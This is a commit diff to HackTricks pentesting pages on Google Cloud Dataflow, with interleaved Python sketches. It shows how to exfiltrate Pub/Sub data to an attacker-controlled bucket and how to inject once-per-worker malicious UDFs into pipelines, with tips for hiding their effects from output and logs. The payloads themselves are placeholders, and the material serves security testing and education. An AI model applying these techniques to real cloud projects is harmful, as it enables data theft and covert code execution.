Commit cd9939d

1 parent 936fbc4 commit cd9939d

3 files changed: 28 additions & 5 deletions

File: src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md (6 additions & 0 deletions)

````diff
@@ -46,4 +46,10 @@ Dataflow templates exist to export BigQuery data. Use the appropriate template f
 
 Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
 
+## References
+
+- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
+- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
+
 {{#include ../../../banners/hacktricks-training.md}}
````
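The streaming Pub/Sub-to-GCS exfiltration described in the hunk above comes down to launching a provided template with an attacker-controlled output bucket. A minimal Python sketch that assembles the `gcloud` invocation — the template path `gs://dataflow-templates/latest/Cloud_PubSub_to_GCS_Text` and the parameter names (`inputSubscription`, `outputDirectory`, `outputFilenamePrefix`) are assumptions taken from the provided-templates catalog and should be verified against the current docs before use:

```python
# Sketch only: builds (does not run) a job-launch command from a provided
# template. Template path and parameter names are assumptions; verify them.
def build_launch_cmd(job_name, region, subscription, out_bucket):
    template = "gs://dataflow-templates/latest/Cloud_PubSub_to_GCS_Text"
    params = ",".join([
        f"inputSubscription={subscription}",           # target Pub/Sub subscription
        f"outputDirectory=gs://{out_bucket}/exfil/",   # attacker-controlled bucket
        "outputFilenamePrefix=dump-",
    ])
    return [
        "gcloud", "dataflow", "jobs", "run", job_name,
        f"--gcs-location={template}",
        f"--region={region}",
        f"--parameters={params}",
    ]

# Hypothetical project/subscription names, for illustration only.
cmd = build_launch_cmd("innocuous-job", "us-central1",
                       "projects/victim/subscriptions/target-sub", "attacker-bucket")
print(" ".join(cmd))
```

Building the argv as a list (rather than one shell string) keeps the sketch copy-pasteable into `subprocess.run` without quoting surprises.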

File: src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md (15 additions & 4 deletions)
````diff
@@ -37,7 +37,7 @@ gcloud dataflow jobs list --region=<region>
 gcloud dataflow jobs list --project=<PROJECT_ID>
 
 # Describe a job to get template GCS path, staging location, and any UDF/template references
-gcloud dataflow jobs describe <JOB_ID> --region=<region> --format="yaml"
+gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
 # Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
 # Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
 ```
````
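The `# Look for:` hints above are easy to automate. A small sketch that scans the `describe` output for the GCS artifact paths named in those comments — a plain text scan so it needs no YAML library; the sample output below is hypothetical:

```python
import re

# Keys the comments above say to look for in the job description.
KEYS = ("tempLocation", "stagingLocation", "templateLocation", "flexTemplateGcsPath")

def find_artifact_paths(describe_output):
    """Return {key: gs:// path} for every interesting key present."""
    found = {}
    for key in KEYS:
        m = re.search(r"\b" + key + r":\s*(gs://\S+)", describe_output)
        if m:
            found[key] = m.group(1)
    return found

# Hypothetical fragment of `gcloud dataflow jobs describe ... --format=yaml` output.
sample = """\
sdkPipelineOptions:
  tempLocation: gs://victim-bucket/tmp
  templateLocation: gs://victim-bucket/templates/job.json
"""
print(find_artifact_paths(sample))
# {'tempLocation': 'gs://victim-bucket/tmp', 'templateLocation': 'gs://victim-bucket/templates/job.json'}
```

Any path it returns is a candidate for the GCS enumeration steps later in the page.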
````diff
@@ -99,8 +99,10 @@ def _malicious_func():
     coordination_file = "/tmp/pwnd.txt"
     if os.path.exists(coordination_file):
         return
-
+
     # malicious code goes here
+    with open(coordination_file, "w", encoding="utf-8") as f:
+        f.write("done")
 
 def transform(line):
     # Malicious code entry point - runs per line but coordination ensures once per worker
````
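The coordination-file pattern in the hunk above is what makes the payload fire once per worker even though `transform()` runs once per element. A standalone sketch of the same guard, with the payload replaced by a harmless counter so the once-only behavior is observable:

```python
import os
import tempfile

# Marker path stands in for the /tmp/pwnd.txt coordination file from the diff.
COORDINATION_FILE = os.path.join(tempfile.gettempdir(), "pwnd_demo.txt")
if os.path.exists(COORDINATION_FILE):  # fresh start for the demo
    os.remove(COORDINATION_FILE)

payload_runs = {"count": 0}

def _payload_once():
    if os.path.exists(COORDINATION_FILE):
        return  # marker present: payload already ran on this worker
    payload_runs["count"] += 1  # payload would go here (placeholder)
    with open(COORDINATION_FILE, "w", encoding="utf-8") as f:
        f.write("done")         # drop the marker so we never re-run

def transform(line):
    _payload_once()
    return line                 # element passes through unchanged

out = [transform(x) for x in ["a", "b", "c"]]
print(payload_runs["count"])  # 1 — three elements, one payload execution
```

The per-worker scoping falls out of the marker living on the worker's local filesystem: each VM has its own `/tmp`, so each worker runs the payload exactly once.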
````diff
@@ -140,10 +142,15 @@ Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes val
         from datetime import datetime
         coordination_file = "/tmp/pwnd.txt"
         if os.path.exists(coordination_file):
-            return
+            return True
         try:
             import urllib.request
-            # malicious code goes here
+            # malicious code goes here
+            with open(coordination_file, "w", encoding="utf-8") as f:
+                f.write("done")
+        except Exception:
+            pass
+        return True
     append: true
 - name: CleanupTransform
   type: MapToFields
````
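Note why the hunk above changes `return` to `return True`: in a Beam YAML `Filter` UDF the callable's return value decides whether the row is kept, so returning `True` on every path keeps the output identical to a clean run, and the `try/except: pass` keeps payload failures out of the job logs. A standalone sketch of that contract, with the payload again replaced by a marker write and an assumed plain-Python harness instead of a real pipeline:

```python
import os
import tempfile

MARKER = os.path.join(tempfile.gettempdir(), "beam_udf_demo.txt")
if os.path.exists(MARKER):  # fresh start for the demo
    os.remove(MARKER)

def malicious_filter(row):
    """Filter-style UDF: side effect once, then behave as a keep-everything filter."""
    if os.path.exists(MARKER):
        return True  # already ran: just pass the row through
    try:
        # payload would go here (placeholder)
        with open(MARKER, "w", encoding="utf-8") as f:
            f.write("done")
    except Exception:
        pass         # never let the payload fail the pipeline
    return True      # keep the row regardless

rows = [{"id": 1}, {"id": 2}, {"id": 3}]
kept = [r for r in rows if malicious_filter(r)]
print(len(kept))  # 3 — every row survives, so the output looks untouched
```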
@@ -169,5 +176,9 @@ For exploitation details, see:
169176
## References
170177

171178
- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
179+
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
180+
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
181+
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
182+
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
172183

173184
{{#include ../../../banners/hacktricks-training.md}}

File: src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md (7 additions & 1 deletion)

````diff
@@ -12,7 +12,7 @@ A Dataflow pipeline typically includes:
 
 **Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
 
-**Launcher:** A short-lived Compute Engine instance that validates the template and prepares containers before the job runs.
+**Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
 
 **Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
 
````
````diff
@@ -76,4 +76,10 @@ gcloud storage ls gs://<bucket>/**
 ../gcp-persistence/gcp-dataflow-persistence.md
 {{#endref}}
 
+## References
+
+- [Dataflow overview](https://cloud.google.com/dataflow)
+- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
+- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
+
 {{#include ../../../banners/hacktricks-training.md}}
````
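The `gcloud storage ls gs://<bucket>/**` enumeration referenced in the hunk above returns a flat object listing. A hypothetical helper for triaging that listing into the Dataflow artifacts worth downloading (template definitions, pipeline code, dependency manifests) — the suffix/keyword heuristics are illustrative, not anything Dataflow defines:

```python
# Illustrative triage of a `gcloud storage ls gs://<bucket>/**` listing.
# Heuristics only: real staging buckets may use other names.
MARKERS = {
    "template": ("template", ".json"),
    "pipeline code": (".py", ".jar"),
    "dependencies": ("requirements.txt", "setup.py"),
}

def triage(listing):
    """Group object paths by which artifact category they look like."""
    hits = {label: [] for label in MARKERS}
    for obj in listing:
        for label, needles in MARKERS.items():
            if any(n in obj for n in needles):
                hits[label].append(obj)
    return hits

# Hypothetical bucket contents.
listing = [
    "gs://victim-staging/templates/job_template.json",
    "gs://victim-staging/staging/pipeline.py",
    "gs://victim-staging/staging/requirements.txt",
]
for label, objs in triage(listing).items():
    print(label, objs)
```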
